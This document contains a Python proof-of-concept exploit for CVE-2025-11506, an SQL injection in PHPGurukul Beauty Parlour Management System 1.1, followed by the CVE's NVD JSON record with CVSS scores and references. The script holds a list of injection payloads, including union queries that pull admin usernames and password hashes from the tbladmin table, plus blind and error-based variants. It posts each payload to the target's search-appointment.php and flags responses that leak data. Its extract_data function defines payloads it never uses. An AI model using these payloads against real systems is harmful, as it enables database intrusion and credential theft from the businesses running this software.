CVE-2025-11506

# CVE-2025-11506 PoC - SQL Injection in PHPGurukul Beauty Parlour Management System 1.1 # Vulnerable file: /admin/search-appointment.php # Vulnerable parameter: searchdata import requests # Target configuration TARGET_URL = "http://target.com/admin/search-appointment.php" # SQL Injection payloads def exploit_sqli(target_url): """ Exploit SQL injection vulnerability in searchdata parameter """ # Basic SQL injection test payloads = [ # Test for basic SQL injection "' OR '1'='1", "' OR '1'='1' -- ", "' OR '1'='1' #", # Union-based injection to extract database version "' UNION SELECT 1,version(),3,4,5-- ", # Union-based injection to extract current database "' UNION SELECT 1,database(),3,4,5-- ", # Union-based injection to extract table names "' UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- ", # Union-based injection to extract user credentials "' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 FROM tbladmin-- ", # Time-based blind injection "' OR SLEEP(5)-- ", "1' AND (SELECT SLEEP(5))-- ", # Boolean-based blind injection "' AND 1=1-- ", "' AND 1=2-- ", # Error-based injection "' AND extractvalue(1,concat(0x7e,version()))-- ", "' AND updatexml(1,concat(0x7e,database()),1)-- ", ] for payload in payloads: try: # Send POST request with malicious payload data = { "searchdata": payload } response = requests.post(target_url, data=data, timeout=10) # Check for successful injection indicators if response.status_code == 200: # Check response for database information leakage if any(keyword in response.text.lower() for keyword in ["mysql", "version", "root", "admin", "password", "tbladmin"]): print(f"[+] Successful injection with payload: {payload}") print(f"[+] Response snippet: {response.text[:500]}") return True, payload, response.text except Exception as e: print(f"[-] Error with payload {payload}: {e}") return False, None, None def extract_data(target_url): """ Extract sensitive data from database using SQL injection """ # Extract database name db_payload = "' UNION SELECT 1,database(),3,4,5-- " # Extract all tables tables_payload = "' UNION SELECT 1,group_concat(table_name SEPARATOR ','),3,4,5 FROM information_schema.tables WHERE table_schema=database()-- " # Extract admin credentials admin_payload = "' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 FROM tbladmin-- " print("[*] Starting SQL injection exploitation...") success, payload, response = exploit_sqli(TARGET_URL) if success: print("[+] Database extraction completed successfully") else: print("[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": extract_data(TARGET_URL)

{"cve": {"id": "CVE-2025-11506", "sourceIdentifier": "[email protected]", "published": "2025-10-08T22:15:32.167", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in PHPGurukul Beauty Parlour Management System 1.1. The affected element is an unknown function of the file /admin/search-appointment.php. The manipulation of the argument searchdata results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:beauty_parlour_management_system:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "A0663F5C-7E50-4432-817D-518802751580"}]}]}], "references": [{"url": "https://github.com/f000x0/cve/issues/11", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.327631", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327631", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.668805", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/f000x0/cve/issues/11", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}